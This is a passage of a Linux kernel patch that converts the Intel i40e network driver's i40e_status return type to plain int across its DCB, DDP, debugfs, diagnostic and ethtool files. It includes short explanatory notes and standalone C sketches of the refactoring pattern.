+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+@@ -6056,7 +5920,7 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -6064,8 +5928,8 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_remove_cloud_filters);
+@@ -6093,7 +5957,7 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6101,8 +5965,8 @@ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
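
The hunks above apply one mechanical conversion across i40e_common.c: the
driver-private i40e_status / i40e_status_code return type becomes plain
int, while the I40E_ERR_* values actually returned are left untouched, so
callers see the same numeric results. A minimal userspace sketch of the
pattern (the struct, function, and error value below are illustrative
stand-ins, not driver code):

#include <stdio.h>

#define EXAMPLE_ERR_PARAM (-5)	/* stand-in for an I40E_ERR_* value */

struct example_hw { unsigned int reg; };

/* Before: i40e_status example_read(struct example_hw *hw, unsigned int *val);
 * After:  plain int, same error values, so callers need no changes. */
static int example_read(struct example_hw *hw, unsigned int *val)
{
	int status = 0;		/* was: i40e_status status = 0; */

	if (!val)
		return EXAMPLE_ERR_PARAM;

	*val = hw->reg;
	return status;
}

int main(void)
{
	struct example_hw hw = { .reg = 0x2a };
	unsigned int val;

	printf("ok:  %d\n", example_read(&hw, &val));	/* prints 0 */
	printf("bad: %d\n", example_read(&hw, NULL));	/* prints -5 */
	return 0;
}
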
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.c b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+index 673f341f4c0c1..90638b67f8dc8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+@@ -12,7 +12,7 @@
+  *
+  * Get the DCBX status from the Firmware
+  **/
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
++int i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
+ {
+ 	u32 reg;
+ 
+@@ -497,15 +497,15 @@ static void i40e_parse_org_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Parse DCB configuration from the LLDPDU
+  **/
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_org_tlv *tlv;
+-	u16 type;
+-	u16 length;
+ 	u16 typelength;
+ 	u16 offset = 0;
++	int ret = 0;
++	u16 length;
++	u16 type;
+ 
+ 	if (!lldpmib || !dcbcfg)
+ 		return I40E_ERR_PARAM;
+@@ -551,12 +551,12 @@ i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+  *
+  * Query DCB configuration from the Firmware
+  **/
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg)
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_virt_mem mem;
++	int ret = 0;
+ 	u8 *lldpmib;
+ 
+ 	/* Allocate the LLDPDU */
+@@ -767,9 +767,9 @@ static void i40e_cee_to_dcb_config(
+  *
+  * Get IEEE mode DCB configuration from the Firmware
+  **/
+-static i40e_status i40e_get_ieee_dcb_config(struct i40e_hw *hw)
++static int i40e_get_ieee_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	/* IEEE mode */
+ 	hw->local_dcbx_config.dcbx_mode = I40E_DCBX_MODE_IEEE;
+@@ -797,11 +797,11 @@ out:
+  *
+  * Get DCB configuration from the Firmware
+  **/
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw)
++int i40e_get_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
+-	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
+ 	struct i40e_aqc_get_cee_dcb_cfg_v1_resp cee_v1_cfg;
++	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
++	int ret = 0;
+ 
+ 	/* If Firmware version < v4.33 on X710/XL710, IEEE only */
+ 	if ((hw->mac.type == I40E_MAC_XL710) &&
+@@ -867,11 +867,11 @@ out:
+  *
+  * Update DCB configuration from the Firmware
+  **/
+-i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
++int i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_variables lldp_cfg;
+ 	u8 adminstatus = 0;
++	int ret = 0;
+ 
+ 	if (!hw->func_caps.dcb)
+ 		return I40E_NOT_SUPPORTED;
+@@ -940,13 +940,13 @@ i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+  * Get status of FW Link Layer Discovery Protocol (LLDP) Agent.
+  * Status of agent is reported via @lldp_status parameter.
+  **/
+-enum i40e_status_code
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status)
+ {
+ 	struct i40e_virt_mem mem;
+-	i40e_status ret;
+ 	u8 *lldpmib;
++	int ret;
+ 
+ 	if (!lldp_status)
+ 		return I40E_ERR_PARAM;
+@@ -1238,13 +1238,13 @@ static void i40e_add_dcb_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Set DCB configuration to the Firmware
+  **/
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
++int i40e_set_dcb_config(struct i40e_hw *hw)
+ {
+ 	struct i40e_dcbx_config *dcbcfg;
+ 	struct i40e_virt_mem mem;
+ 	u8 mib_type, *lldpmib;
+-	i40e_status ret;
+ 	u16 miblen;
++	int ret;
+ 
+ 	/* update the hw local config */
+ 	dcbcfg = &hw->local_dcbx_config;
+@@ -1274,8 +1274,8 @@ i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
+  *
+  * send DCB configuration to FW
+  **/
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+ 	u16 length, offset = 0, tlvid, typelength;
+ 	struct i40e_lldp_org_tlv *tlv;
+@@ -1888,13 +1888,13 @@ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+  *
+  * Reads the LLDP configuration data from NVM using passed addresses
+  **/
+-static i40e_status _i40e_read_lldp_cfg(struct i40e_hw *hw,
+-				       struct i40e_lldp_variables *lldp_cfg,
+-				       u8 module, u32 word_offset)
++static int _i40e_read_lldp_cfg(struct i40e_hw *hw,
++			       struct i40e_lldp_variables *lldp_cfg,
++			       u8 module, u32 word_offset)
+ {
+ 	u32 address, offset = (2 * word_offset);
+-	i40e_status ret;
+ 	__le16 raw_mem;
++	int ret;
+ 	u16 mem;
+ 
+ 	ret = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -1950,10 +1950,10 @@ err_lldp_cfg:
+  *
+  * Reads the LLDP configuration data from NVM
+  **/
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg)
++int i40e_read_lldp_cfg(struct i40e_hw *hw,
++		       struct i40e_lldp_variables *lldp_cfg)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 mem;
+ 
+ 	if (!lldp_cfg)
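
Where a declaration line is touched anyway, the hunks also reorder locals
into the netdev "reverse Christmas tree" style, longest declaration first,
as in i40e_lldp_to_dcb_config() above. A standalone sketch of that ordering
around an LLDP TLV header decode (the 16-bit header packs a 7-bit type
above a 9-bit length); the function is an illustrative stand-in, not the
driver's parser:

#include <stdio.h>

static void example_decode_tlv(const unsigned char *buf,
			       unsigned int *type, unsigned int *length)
{
	unsigned int typelength;

	typelength = (buf[0] << 8) | buf[1];
	*type = typelength >> 9;	/* top 7 bits */
	*length = typelength & 0x1ff;	/* low 9 bits */
}

int main(void)
{
	const unsigned char hdr[2] = { 0x02, 0x07 };	/* longest first */
	unsigned int length;
	unsigned int type;

	example_decode_tlv(hdr, &type, &length);
	printf("type=%u length=%u\n", type, length);	/* type=1 length=7 */
	return 0;
}
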
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.h b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+index 2370ceecb0612..6b60dc9b77361 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+@@ -264,20 +264,20 @@ void i40e_dcb_hw_calculate_pool_sizes(struct i40e_hw *hw,
+ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+ 			      struct i40e_rx_pb_config *old_pb_cfg,
+ 			      struct i40e_rx_pb_config *new_pb_cfg);
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw,
+-				 u16 *status);
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_init_dcb(struct i40e_hw *hw,
+-			  bool enable_mib_change);
+-enum i40e_status_code
++int i40e_get_dcbx_status(struct i40e_hw *hw,
++			 u16 *status);
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg);
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg);
++int i40e_get_dcb_config(struct i40e_hw *hw);
++int i40e_init_dcb(struct i40e_hw *hw,
++		  bool enable_mib_change);
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status);
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg);
++int i40e_set_dcb_config(struct i40e_hw *hw);
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg);
+ #endif /* _I40E_DCB_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+index e32c61909b310..bba70bd5703bf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+@@ -135,8 +135,8 @@ static int i40e_dcbnl_ieee_setets(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB ETS configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB ETS configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -174,8 +174,8 @@ static int i40e_dcbnl_ieee_setpfc(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB PFC configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB PFC configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -225,8 +225,8 @@ static int i40e_dcbnl_ieee_setapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -290,8 +290,8 @@ static int i40e_dcbnl_ieee_delapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
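
A knock-on effect of the type change shows up in the i40e_dcb_nl.c hunks
above: with the status now a plain int there is no enum for i40e_stat_str()
to decode, so the dev_info() calls print the value directly with %d, and
only the admin-queue error keeps its string decode via i40e_aq_str(). A
hedged stand-in for the resulting log line (the helper below only mimics
i40e_aq_str(); its strings and the status value are illustrative):

#include <stdio.h>

static const char *example_aq_str(int aq_rc)
{
	return aq_rc ? "I40E_AQ_RC_EINVAL" : "I40E_AQ_RC_OK";
}

int main(void)
{
	int ret = -53;	/* stand-in status; any nonzero int */

	/* Before: "... err %s aq_err %s", i40e_stat_str(hw, ret), ... */
	printf("Failed setting DCB ETS configuration err %d aq_err %s\n",
	       ret, example_aq_str(1));
	return 0;
}
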
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ddp.c b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+index e1069ae658ad3..7e8183762fd95 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ddp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+@@ -36,7 +36,7 @@ static int i40e_ddp_does_profile_exist(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -91,7 +91,7 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -117,14 +117,14 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-static enum i40e_status_code
++static int
+ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -157,14 +157,14 @@ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Removes DDP profile from the NIC.
+  **/
+-static enum i40e_status_code
++static int
+ i40e_del_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -270,12 +270,12 @@ int i40e_ddp_load(struct net_device *netdev, const u8 *data, size_t size,
+ 	struct i40e_profile_segment *profile_hdr;
+ 	struct i40e_profile_info pinfo;
+ 	struct i40e_package_header *pkg_hdr;
+-	i40e_status status;
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 track_id;
+ 	int istatus;
++	int status;
+ 
+ 	pkg_hdr = (struct i40e_package_header *)data;
+ 	if (!i40e_ddp_is_pkg_hdr_valid(netdev, pkg_hdr, size))
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+index c9dcd6d92c832..9954493cd4489 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+@@ -918,9 +918,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		dev_info(&pf->pdev->dev, "deleting relay %d\n", veb_seid);
+ 		i40e_veb_release(pf->veb[i]);
+ 	} else if (strncmp(cmd_buf, "add pvid", 8) == 0) {
+-		i40e_status ret;
+-		u16 vid;
+ 		unsigned int v;
++		int ret;
++		u16 vid;
+ 
+ 		cnt = sscanf(&cmd_buf[8], "%i %u", &vsi_seid, &v);
+ 		if (cnt != 2) {
+@@ -1284,7 +1284,7 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		}
+ 	} else if (strncmp(cmd_buf, "send aq_cmd", 11) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+@@ -1330,9 +1330,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		desc = NULL;
+ 	} else if (strncmp(cmd_buf, "send indirect aq_cmd", 20) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
+ 		u16 buffer_len;
+ 		u8 *buff;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ca229b0efeb65..97fe1787a8f4a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -10,8 +10,8 @@
+  * @reg: reg to be tested
+  * @mask: bits to be touched
+  **/
+-static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+-							u32 reg, u32 mask)
++static int i40e_diag_reg_pattern_test(struct i40e_hw *hw,
++				      u32 reg, u32 mask)
+ {
+ 	static const u32 patterns[] = {
+ 		0x5A5A5A5A, 0xA5A5A5A5, 0x00000000, 0xFFFFFFFF
+@@ -74,9 +74,9 @@ const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+  *
+  * Perform registers diagnostic test
+  **/
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
++int i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg, mask;
+ 	u32 elements;
+ 	u32 i, j;
+@@ -115,9 +115,9 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+  *
+  * Perform EEPROM diagnostic test
+  **/
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw)
++int i40e_diag_eeprom_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 	u16 reg_val;
+ 
+ 	/* read NVM control word and if NVM valid, validate EEPROM checksum*/
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index 1db7c6d572311..c3ce5f35211f0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -22,7 +22,7 @@ struct i40e_diag_reg_test_info {
+ 
+ extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
++int i40e_diag_reg_test(struct i40e_hw *hw);
++int i40e_diag_eeprom_test(struct i40e_hw *hw);
+ 
+ #endif /* _I40E_DIAG_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+index f6fa63e4253c5..e632041aed5f8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+@@ -1226,8 +1226,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool autoneg_changed = false;
+-	i40e_status status = 0;
+ 	int timeout = 50;
++	int status = 0;
+ 	int err = 0;
+ 	__u32 speed;
+ 	u8 autoneg;
+@@ -1453,8 +1453,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1463,8 +1463,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_update_link_info(hw);
+ 		if (status)
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 
+ 	} else {
+@@ -1483,7 +1483,7 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	u32 flags = 0;
+ 	int err = 0;
+ 
+@@ -1515,8 +1515,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1529,8 +1529,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 			 * (e.g. no physical connection etc.)
+ 			 */
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1545,7 +1545,7 @@ static int i40e_get_fec_param(struct net_device *netdev,
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	int err = 0;
+ 	u8 fec_cfg;
+ 
+@@ -1632,12 +1632,12 @@ static int i40e_nway_reset(struct net_device *netdev)
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool link_up = hw->phy.link_info.link_info & I40E_AQ_LINK_UP;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	ret = i40e_aq_set_link_restart_an(hw, link_up, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "link restart failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "link restart failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -1697,9 +1697,9 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+ 	struct i40e_dcbx_config *dcbx_cfg = &hw->local_dcbx_config;
+ 	bool link_up = hw_link_info->link_info & I40E_AQ_LINK_UP;
+-	i40e_status status;
+ 	u8 aq_failures;
+ 	int err = 0;
++	int status;
+ 	u32 is_an;
+ 
+ 	/* Changing the port's flow control is not supported if this isn't the
+@@ -1753,20 +1753,20 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	status = i40e_set_fc(hw, &aq_failures, link_up);
+ 
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_GET) {
+-		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_SET) {
+-		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_UPDATE) {
+-		netdev_info(netdev, "Set fc failed on the get_link_info call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_link_info call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+@@ -2581,8 +2581,8 @@ static u64 i40e_link_test(struct net_device *netdev, u64 *data)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_pf *pf = np->vsi->back;
+-	i40e_status status;
+ 	bool link_up = false;
++	int status;
+ 
+ 	netif_info(pf, hw, netdev, "link test\n");
+ 	status = i40e_get_link_status(&pf->hw, &link_up);
+@@ -2805,11 +2805,11 @@ static int i40e_set_phys_id(struct net_device *netdev,
+ 			    enum ethtool_phys_id_state state)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+-	i40e_status ret = 0;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	int blink_freq = 2;
+ 	u16 temp_status;
++	int ret = 0;
+ 
+ 	switch (state) {
+ 	case ETHTOOL_ID_ACTIVE:
+@@ -5245,7 +5245,7 @@ static int i40e_set_priv_flags(struct net_device *dev, u32 flags)
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 reset_needed = 0;
+-	i40e_status status;
++	int status;
+ 	u32 i, j;
+ 
+ 	orig_flags = READ_ONCE(pf->flags);
+@@ -5360,8 +5360,8 @@ flags_complete:
+ 						0, NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -5433,9 +5433,8 @@ flags_complete:
+ 					return -EBUSY;
+ 				default:
+ 					dev_warn(&pf->pdev->dev,
+-						 "Starting FW LLDP agent failed: error: %s, %s\n",
+-						 i40e_stat_str(&pf->hw,
+-							       status),
++						 "Starting FW LLDP agent failed: error: %d, %s\n",
++						 status,
+ 						 i40e_aq_str(&pf->hw,
+ 							     adq_err));
+ 					return -EINVAL;
